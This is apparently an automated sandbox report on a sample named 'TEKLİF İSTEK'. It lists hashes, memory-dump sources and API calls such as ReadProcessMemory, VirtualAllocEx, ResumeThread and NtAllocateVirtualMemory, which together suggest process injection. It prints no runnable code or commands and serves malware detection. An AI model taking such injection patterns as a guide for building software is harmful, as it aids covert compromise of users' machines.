• Instruction ID: c3316f771f4d6bbdc07fed870e8b59e04ed5a9d66498ff3978c97d3b5a7c980f
• Opcode Fuzzy Hash: 344ac012c72ad8e39294159afe486259fc7eee520491e8113de476e1fce3f23e
• Instruction Fuzzy Hash: 8D213571D003098FDB10DFAAC4857EEBBF5BF88324F54842AE419A7241CB79A945CFA5

Control-flow Graph (graph image not preserved; legend: Executed / Not Executed): 3 basic blocks spanning 9105c08-9105cce; the entry block 9105c08-9105c95 calls ReadProcessMemory. This summary overlaps the 9105c01-9105cce one above: it enters the same code 7 bytes later and reaches the same call site (ref 09105C88), so it is a second entry point into the same function.
APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09105C88
Memory Dump Source
• Source File: 00000000.00000002.1561726451.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9100000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
• Opcode ID: d0efc5423dd4e0a278ea8a3a5287e5f4946374a0e3316f035396d6214abc496f
• Instruction ID: 34a668065b5e134f21e7a1a5693f9b71527548ace036a7121b9fac7fae05780b
• Opcode Fuzzy Hash: d0efc5423dd4e0a278ea8a3a5287e5f4946374a0e3316f035396d6214abc496f
• Instruction Fuzzy Hash: 062116B19003499FDB10CFAAC944BEEBBF5FF48310F54842AE518A7240C7799500DBA1

Control-flow Graph (graph image not preserved; legend: Executed / Not Executed): 3 basic blocks spanning 2f3d709-2f3d7ca; the entry block 2f3d709-2f3d7a4 calls DuplicateHandle. This summary overlaps the 2f3d2fc-2f3d7ca one above: its entry lies inside that summary's first block and it reaches the same call site (ref 02F3D797), so it is a second entry point into the same function.
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02F3D6D6,?,?,?,?,?), ref: 02F3D797
Memory Dump Source
• Source File: 00000000.00000002.1552045682.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2f30000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: 856f89f702b1c51eeda2e46e11c108a38fb3ac05a2ff130d2cc671243480f45e
• Instruction ID: 51908b7da6b664120d8cf14f0be5f0dfde3affc9bae01372ad06cd70eddadf66
• Opcode Fuzzy Hash: 856f89f702b1c51eeda2e46e11c108a38fb3ac05a2ff130d2cc671243480f45e
• Instruction Fuzzy Hash: 6421E0B5900209DFDB11CFAAD984AEEBBF4AB48224F14841AE918B7310D378A940CF61

Control-flow Graph (graph image not preserved; legend: Executed / Not Executed): 3 basic blocks spanning 9105a51-9105b01; the entry block 9105a51-9105ad3 calls VirtualAllocEx.
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 09105AC6
Memory Dump Source
• Source File: 00000000.00000002.1561726451.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9100000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: bf86573f886272bf276fdfeb63e47ed404489616663e3e2c2d87465611f31767
• Instruction ID: c7d08a7ba00b9d0961b38dc7d485b6ce5c055ceee257d55570c6b4e2f16cc5ab
• Opcode Fuzzy Hash: bf86573f886272bf276fdfeb63e47ed404489616663e3e2c2d87465611f31767
• Instruction Fuzzy Hash: 15114772900349DFDB10DFAAD845BDEBBF5EB88320F14881AE519A7250C779A540CFA1
                                                                                                              APIs
                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 09105AC6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1561726451.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_9100000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 4275171209-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1561726451.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9100000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1561726451.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9100000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 02F3B07E
Memory Dump Source
• Source File: 00000000.00000002.1552045682.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2f30000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
APIs
• PostMessageW.USER32(?,00000010,00000000,?), ref: 0910864D
Memory Dump Source
• Source File: 00000000.00000002.1561726451.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9100000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
APIs
• PostMessageW.USER32(?,00000010,00000000,?), ref: 0910864D
Memory Dump Source
• Source File: 00000000.00000002.1561726451.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9100000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
Memory Dump Source
• Source File: 00000000.00000002.1551014891.000000000121D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0121D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_121d000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1551014891.000000000121D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0121D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_121d000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1551089342.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_122d000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1551089342.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_122d000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1551089342.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_122d000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1551014891.000000000121D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0121D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_121d000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1551014891.000000000121D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0121D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_121d000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1551089342.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_122d000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1551014891.000000000121D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0121D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_121d000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1551014891.000000000121D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0121D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_121d000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1558402839.0000000005650000.00000040.00000800.00020000.00000000.sdmp, Offset: 05650000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5650000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                              • Opcode ID: 69b5f12a7a5ee704a79654e8890869ba2825a6c5242d4315f8d01307e87e5b97
                                                                                                              • Instruction ID: 68918b2e93221d126a208cbe4d504f6040dfa6fd5ff7a67a2cef4c1e396f5669
                                                                                                              • Opcode Fuzzy Hash: 69b5f12a7a5ee704a79654e8890869ba2825a6c5242d4315f8d01307e87e5b97
                                                                                                              • Instruction Fuzzy Hash: 7512A7F2C8976D8BD710CF65E84C189BBB1B745394BD04A09D3622F2E1DBB8116ACF44
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1561726451.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_9100000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 41caea8411185ae7fb9f9970d014624d42092ca561f1f1302d6a9ec1060b4922
                                                                                                              • Instruction ID: aa470098abe12001be4e5d42ec94021107bbb3ec71192548cfc4980f3e21a204
                                                                                                              • Opcode Fuzzy Hash: 41caea8411185ae7fb9f9970d014624d42092ca561f1f1302d6a9ec1060b4922
                                                                                                              • Instruction Fuzzy Hash: 88E14A74E002198FDB14DF99C590AAEBBF2FF89305F248159E815AB385D771AD41CF60
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1561726451.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_9100000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e6e0d1a93026310cc539bc9417521bab8db8e4cf2e317e712bc18a929d76065d
                                                                                                              • Instruction ID: 373bd6b21f92c873efb0e3bdce9d9ac6efe29966ad93aaa1dac991faec2f3d13
                                                                                                              • Opcode Fuzzy Hash: e6e0d1a93026310cc539bc9417521bab8db8e4cf2e317e712bc18a929d76065d
                                                                                                              • Instruction Fuzzy Hash: 9EE12974E002198FDB15DFA9C5909AEBBF2FF89305F248169D424AB395C7319D42CFA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1561726451.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_9100000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 53f11da23e25b7af868e721c6c701769a7ae49a4b0ab574fccb104f108c8b631
                                                                                                              • Instruction ID: 6680dd2afbc6292943ac59ca96e5ac39099a932132888a9a9348f142055343a4
                                                                                                              • Opcode Fuzzy Hash: 53f11da23e25b7af868e721c6c701769a7ae49a4b0ab574fccb104f108c8b631
                                                                                                              • Instruction Fuzzy Hash: 5BE10974E002198FDB14DFA9C590AAEBBF2FF89305F248159E425AB395D7319D42CFA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1561726451.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_9100000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3eef5ae51d52f65f4e78233b5e12f934f9b24fc6037a8de790992832aca981aa
                                                                                                              • Instruction ID: a7ca527f836dc86d7e9926928b5f9c2ea5f800c6af2079306ecc1251947ff917
                                                                                                              • Opcode Fuzzy Hash: 3eef5ae51d52f65f4e78233b5e12f934f9b24fc6037a8de790992832aca981aa
                                                                                                              • Instruction Fuzzy Hash: 52E11974E002198FDB14DFA9C590AAEBBF2FF89305F248169D825AB395D731AD41CF60
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1561726451.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_9100000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: eb830a2c2f14a981efd8f8a56e8b6bffb6ccae609cc88af5fbfbf44b9ab532ba
                                                                                                              • Instruction ID: 4369b7483c3c719301b68733f19b023719e232addfce6c7d6abe2d36f7c37017
                                                                                                              • Opcode Fuzzy Hash: eb830a2c2f14a981efd8f8a56e8b6bffb6ccae609cc88af5fbfbf44b9ab532ba
                                                                                                              • Instruction Fuzzy Hash: 93E10974E002198FDB14DF99C5909AEBBF2FF89305F248169D425AB395D7319D42CF60
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1552045682.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_2f30000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ffc76036321aae15c1f8633e031133fb004c46b0ca02d857a546a59933aee4c0
                                                                                                              • Instruction ID: 552f453196512e21807c529e2e489b682d242f0f123848dfc57fba66902f9544
                                                                                                              • Opcode Fuzzy Hash: ffc76036321aae15c1f8633e031133fb004c46b0ca02d857a546a59933aee4c0
                                                                                                              • Instruction Fuzzy Hash: 18A18F36E00219CFCF0ADFB4C84499EB7B2FF85344B15466AEA05AB265DB71E915CF80
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1558402839.0000000005650000.00000040.00000800.00020000.00000000.sdmp, Offset: 05650000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_5650000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d27be4afe3c692f58345d41c9f73af34c918724a6064c79359e098cebb268a5d
                                                                                                              • Instruction ID: 8c59f5451dc6aa3ee6fbab885ce74074be1800f657cfcc475e89ee68e4a81544
                                                                                                              • Opcode Fuzzy Hash: d27be4afe3c692f58345d41c9f73af34c918724a6064c79359e098cebb268a5d
                                                                                                              • Instruction Fuzzy Hash: 8DC12BB2C8476D8BD710CF74E84C189BB71BB853A4F904A09D3626F2D0DBB8246ACF44
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1561726451.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_9100000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 909cf27dea7c51aa5ea8ccebebfa104505878e4b3f095643d6ce2651d5a12f9f
                                                                                                              • Instruction ID: 29aef03b64bd65f53a56b449df802104bfc0ada6e6377cb6ebe2f694ea09f3da
                                                                                                              • Opcode Fuzzy Hash: 909cf27dea7c51aa5ea8ccebebfa104505878e4b3f095643d6ce2651d5a12f9f
                                                                                                              • Instruction Fuzzy Hash: C2510974E002198FDB18CFA9C9905AEBBF2BF89305F248169D428AB255D7319D42CFA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1561726451.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_9100000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 535afc7b0c15b4a8d83e96c352a36f16de7f9d0d91cf31081cdfecf09f944066
                                                                                                              • Instruction ID: f799083cd6aaffe1491bd84c4813ad6b1997c933c124148284a466ce1b506e09
                                                                                                              • Opcode Fuzzy Hash: 535afc7b0c15b4a8d83e96c352a36f16de7f9d0d91cf31081cdfecf09f944066
                                                                                                              • Instruction Fuzzy Hash: F841C671E05668CFEB28CF66CC107DEBBB6AF89304F04C1EAD848A6291D7755A85CF41

Execution Graph

Execution Coverage: 1.4%
Dynamic/Decrypted Code Coverage: 2.7%
Signature Coverage: 5.8%
Total number of Nodes: 553
Total number of Limit Nodes: 68
96409->96329 96411 40f683 96410->96411 96417 419e60 96411->96417 96415 419d3c 96414->96415 96416 41af30 LdrLoadDll 96414->96416 96415->96337 96416->96415 96418 41af30 LdrLoadDll 96417->96418 96419 419e7c 96418->96419 96422 1b82dd0 LdrInitializeThunk 96419->96422 96420 40f6ae 96420->96329 96422->96420 96423->96260 96425 41af30 LdrLoadDll 96424->96425 96426 419fac 96424->96426 96425->96426 96429 1b82f30 LdrInitializeThunk 96426->96429 96427 40f4fe 96427->96266 96427->96267 96429->96427 96430->96272 96431->96277 96432->96282 96435 1b82ad0 LdrInitializeThunk

Control-flow Graph
APIs
• NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A425
Memory Dump Source
• Source File: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID: FileRead
• String ID: 1JA$rMA$rMA
• API String ID: 2738559852-782607585
• Opcode ID: 7aaaa16702adae6d23ede2d680456887a62317e53decf251faaf94379e42fb99
• Instruction ID: 40098347e2ccfe5138c34a84cead36b309c134ff29b5ac5e9c21c1f122b9f0a0
• Opcode Fuzzy Hash: 7aaaa16702adae6d23ede2d680456887a62317e53decf251faaf94379e42fb99
• Instruction Fuzzy Hash: BD0129B2211104ABCB14DF99CC85EEB77A9EF8C364F158649FA1D97251C630E912CBA1

Control-flow Graph
control_flow_graph 8 41a3e0-41a3f6 9 41a3fc-41a429 NtReadFile 8->9 10 41a3f7 call 41af30 8->10 10->9
APIs
• NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A425
Memory Dump Source
• Source File: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID: FileRead
• String ID: 1JA$rMA$rMA
• API String ID: 2738559852-782607585
• Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
• Instruction ID: c75c44bd16ed9a046d03b4490adc68ebadf214b0f3589fd2ba36fb57c0fad8bd
• Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
• Instruction Fuzzy Hash: 95F0B7B2210208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4

Control-flow Graph
control_flow_graph 263 40acf0-40ad0c 264 40ad14-40ad19 263->264 265 40ad0f call 41cc20 263->265 266 40ad1b-40ad1e 264->266 267 40ad1f-40ad2d call 41d040 264->267 265->264 270 40ad3d-40ad4e call 41b470 267->270 271 40ad2f-40ad3a call 41d2c0 267->271 276 40ad50-40ad64 LdrLoadDll 270->276 277 40ad67-40ad6a 270->277 271->270 276->277
APIs
• LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
Memory Dump Source
• Source File: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0
• Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
• Instruction ID: 667dcf47c4413345b20473d406be44d3d8b7ebea9a3b2269cd40777f9644ce6e
• Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
• Instruction Fuzzy Hash: 79015EB5D0020DBBDB10EBA1DC42FDEB3799F54308F0045AAA908A7281F638EB54CB95

Control-flow Graph
control_flow_graph 278 41a330-41a381 call 41af30 NtCreateFile
APIs
• NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A37D
Memory Dump Source
• Source File: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
• Instruction ID: 7ed6e6cb708c972561b0f9910f559a39af1ab3cc862b6eef20835abd22e26781
• Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
• Instruction Fuzzy Hash: C4F0BDB2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E851CBA4

Control-flow Graph
control_flow_graph 281 41a50f-41a54d call 41af30 NtAllocateVirtualMemory
APIs
• NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B104,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A549
Memory Dump Source
• Source File: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID: AllocateMemoryVirtual
• String ID:
• API String ID: 2167126740-0
• Opcode ID: 010e29acb7f9fd415614937ca605b5bfb6e9e985f7aa4afa3a131315dc63b2b1
• Instruction ID: b6d20d9d9baca4ad67b6d83bb7e3b47810d24a1c747aa2bf8ffe25eb9f604490
• Opcode Fuzzy Hash: 010e29acb7f9fd415614937ca605b5bfb6e9e985f7aa4afa3a131315dc63b2b1
• Instruction Fuzzy Hash: 99F01CB5211108AFCB14DF99CC81EEB77A9AF88354F15824DFE0997241C630E811CBA0

Control-flow Graph
control_flow_graph 284 41a510-41a526 285 41a52c-41a54d NtAllocateVirtualMemory 284->285 286 41a527 call 41af30 284->286 286->285
APIs
• NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B104,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A549
Memory Dump Source
• Source File: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID: AllocateMemoryVirtual
• String ID:
• API String ID: 2167126740-0
• Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
• Instruction ID: 8b47746d7073478515a2f8fd1fb94e42dcc9ffa91ac9ff965dae3841ed3a313c
• Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
• Instruction Fuzzy Hash: 9CF015B2210208ABCB14DF89CC81EEB77ADAF88754F118149BE0897241C630F811CBA4
APIs
• NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A485
Memory Dump Source
• Source File: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0
• Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
• Instruction ID: e9450f8bec15428cdd91297f97b7848412804bda5c7d31b3f0e5b01193c95e83
• Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
• Instruction Fuzzy Hash: 3CD01776211214ABD710EB99CC85EE77BACEF48764F15449ABA189B242C530FA1186E0
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: e6ba8d57b28f2f1e772721eefddaddbdf42b3370b98e6281db18c85892b7d060
• Instruction ID: 0c9aa786c764ac7fea5567eee4ccf926e56ab11a7faa62e33c549eeff6b48f4f
• Opcode Fuzzy Hash: e6ba8d57b28f2f1e772721eefddaddbdf42b3370b98e6281db18c85892b7d060
• Instruction Fuzzy Hash: 6890023220140C02D6847158440464A000597D2301F95C065A0029655DCB198B5A77A5
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: bd2da079dd82bcab92c4349cb7325c4d2b82658613ba05fc9781c5eee9416425
• Instruction ID: bfd0cc7eb223c07f5d2a45d173b871eb5ffcbfa23c47287eb0336a0880ebce2f
• Opcode Fuzzy Hash: bd2da079dd82bcab92c4349cb7325c4d2b82658613ba05fc9781c5eee9416425
• Instruction Fuzzy Hash: C990026220240403460971584414616400A97E1201B55C071E1018591DC62989926229
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 0b22dc914fe22732028c1d8db2f1281ace86609416c196b7b62db438f8b1129e
• Instruction ID: 757d94789f7288420d8c81e784e0363e20bec9d873ea499aa67ca34cc95a799d
• Opcode Fuzzy Hash: 0b22dc914fe22732028c1d8db2f1281ace86609416c196b7b62db438f8b1129e
• Instruction Fuzzy Hash: 4B900226211404030609B5580704507004697D6351355C071F1019551CD72589625225
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 1ebe32ca9f43946817b268c028187dd283bcc732d241809173037820528a9f36
• Instruction ID: f6d7c45fbe54666d5d3fc244a554f099f38ae35563c4e968d28e089e069d4cb0
• Opcode Fuzzy Hash: 1ebe32ca9f43946817b268c028187dd283bcc732d241809173037820528a9f36
• Instruction Fuzzy Hash: B790023220140813D61571584504707000997D1241F95C462A0428559DD75A8A53A225
                                                                                                              APIs
                                                                                                              Memory Dump Source
